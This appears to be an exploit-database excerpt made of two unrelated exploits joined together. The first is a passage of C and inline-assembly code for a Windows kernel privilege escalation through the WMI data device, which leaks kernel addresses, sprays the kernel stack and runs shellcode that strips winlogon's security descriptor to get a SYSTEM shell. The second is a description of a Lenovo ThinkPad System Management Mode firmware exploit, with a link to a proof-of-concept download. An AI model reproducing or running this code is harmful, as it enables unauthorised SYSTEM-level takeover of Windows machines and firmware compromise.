	HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}

BOOL leakHal()
{
	_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQuerySystemInformation");
	PRTL_PROCESS_MODULES pModuleInfo;
	DWORD ntoskrnlBase;
	DWORD HalDTUser, HalDTOffset;
	HMODULE userKernel;

	pModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (pModuleInfo == NULL)
	{
		printf("Could not allocate memory\n");
		return FALSE;
	}
	NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, 0x100000, NULL);
	ntoskrnlBase = (DWORD)pModuleInfo->Modules[0].ImageBase;
	userKernel = LoadLibraryEx(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
	if (userKernel == NULL)
	{
		printf("Could not load ntoskrnl.exe\n");
		return FALSE;
	}

	HalDTUser = (DWORD)GetProcAddress(userKernel, "HalDispatchTable");
	HalDTOffset = HalDTUser - (DWORD)userKernel;
	g_HalDispatchTable = ntoskrnlBase + HalDTOffset + 0x9000;
	return TRUE;
}

BOOL setup()
{
	LoadLibraryA("user32.dll");

	wc.cbSize = sizeof(WNDCLASSEX);
	wc.style = 0;
	wc.lpfnWndProc = WProc;
	wc.cbClsExtra = 0;
	wc.cbWndExtra = 0;
	wc.hInstance = NULL;
	wc.hCursor = NULL;
	wc.hIcon = NULL;
	wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
	wc.lpszMenuName = NULL;
	wc.lpszClassName = g_windowClassName;
	wc.hIconSm = NULL;

	if (!RegisterClassEx(&wc))
	{
		printf("Failed to register window: %d\n", GetLastError());
		return FALSE;
	}
	g_window = CreateWindowEx(WS_EX_CLIENTEDGE, g_windowClassName, L"Victim_Window", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 240, 120, NULL, NULL, NULL, NULL);
	if (g_window == NULL)
	{
		printf("Failed to create window: %d\n", GetLastError());
		return FALSE;
	}

	g_pSharedInfo = (PSHAREDINFO)GetProcAddress(LoadLibraryA("user32.dll"), "gSharedInfo");
	g_UserHandleTable = g_pSharedInfo->aheList;
	g_pServerInfo = g_pSharedInfo->psi;

	return TRUE;
}

DWORD leakWndAddr(HWND hwnd)
{
	DWORD addr = 0;
	HWND kernelHandle = NULL;

	for (int i = 0; i < g_pServerInfo->cHandleEntries; i++)
	{
		kernelHandle = (HWND)(i | (g_UserHandleTable[i].wUniq << 0x10));
		if (kernelHandle == hwnd)
		{
			addr = (DWORD)g_UserHandleTable[i].phead;
			break;
		}
	}
	return addr;
}

VOID SprayKernelStack() {
	g_ZwMapUserPhysicalPages ZwMapUserPhysicalPages = (g_ZwMapUserPhysicalPages)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "ZwMapUserPhysicalPages");
	if (ZwMapUserPhysicalPages == NULL)
	{
		printf("Could not get ZwMapUserPhysicalPages\n");
		return;
	}
	BYTE buffer[4096];
	DWORD value = g_HalDispatchTable - 0x3C + 0x4;
	for (int i = 0; i < sizeof(buffer) / 4; i++)
	{
		memcpy(buffer + i * 4, &value, sizeof(DWORD));
	}
	printf("Where is at: 0x%x\n", buffer);
	ZwMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
}

__declspec(noinline) int Shellcode()
{
	__asm {
		mov eax, kHandle // WND - Which window? Check this
		mov eax, [eax + 8] // THREADINFO
		mov eax, [eax] // ETHREAD
		mov eax, [eax + 0x150] // KPROCESS
		mov eax, [eax + 0xb8] // flink
		procloop:
		lea edx, [eax - 0xb8] // KPROCESS
		mov eax, [eax]
		add edx, 0x16c // module name
		cmp dword ptr[edx], 0x6c6e6977 // 'winl' for winlogon.exe
		jne procloop
		sub edx, 0x170
		mov dword ptr[edx], 0x0 // NULL ACL
		ret
	}
}

int main() {
	DWORD dwBytesReturned;
	HANDLE threadhandle;
	WMIRECEIVENOTIFICATION buffer;
	CHAR OutPut[1000];

	if (!setup())
	{
		printf("Could not setup window\n");
		return 0;
	}


	PVOID userSC = VirtualAlloc((VOID*)0x2a000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	kHandle = (void*)leakWndAddr(g_window);
	memset(userSC, 0x41, 0x1000);
	memcpy(userSC, Shellcode, 0x40);


	if (!leakHal())
	{
		printf("Could not leak Hal\n");
		return 0;
	}
	printf("HalDispatchTable is at: 0x%x\n", g_HalDispatchTable);

	DWORD value = (DWORD)userSC;
	PBYTE buff = (PBYTE)&buffer;
	for (int i = 0; i < sizeof(buffer) / 4; i++)
	{
		memcpy(buff + i * 4, &value, sizeof(DWORD));
	}
	printf("What is at: 0x%x\n", buff);

	buffer.HandleCount = 0;
	buffer.Action = RECEIVE_ACTION_CREATE_THREAD;
	buffer.UserModeProcess.Handle = GetCurrentProcess();

	HANDLE hDriver = CreateFileA("\\\\.\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hDriver != INVALID_HANDLE_VALUE) {
		SprayKernelStack();

		if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) {
			return 1;
		}

	}
	_NtQueryIntervalProfile NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryIntervalProfile");
	ULONG result;
	KPROFILE_SOURCE stProfile = ProfileTotalIssues;
	NtQueryIntervalProfile(stProfile, &result);
	printf("SYSTEM shell comming\n");
	Launch();
	printf("All done, exiting\n");

	return 0;
}
            
Source: https://github.com/Cr4sh/ThinkPwn

 Lenovo ThinkPad System Management Mode arbitrary code execution exploit

***************************************************************************

For more information about this project please read the following article:

http://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html


This code exploits a 0-day privilege escalation vulnerability (or backdoor?) in the SystemSmmRuntimeRt UEFI driver (GUID 7C79AC8C-5E6C-4E3D-BA6F-C260EE7C172E) of Lenovo firmware. The vulnerability is present in all of the ThinkPad series laptops; the oldest one that I have checked is the X220 and the newest one is the T450s (with the latest firmware versions available at this moment). Running arbitrary System Management Mode code allows an attacker to disable flash write protection and infect platform firmware, disable Secure Boot, bypass Virtual Secure Mode (Credential Guard, etc.) on Windows 10 Enterprise and do other evil things.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40040.zip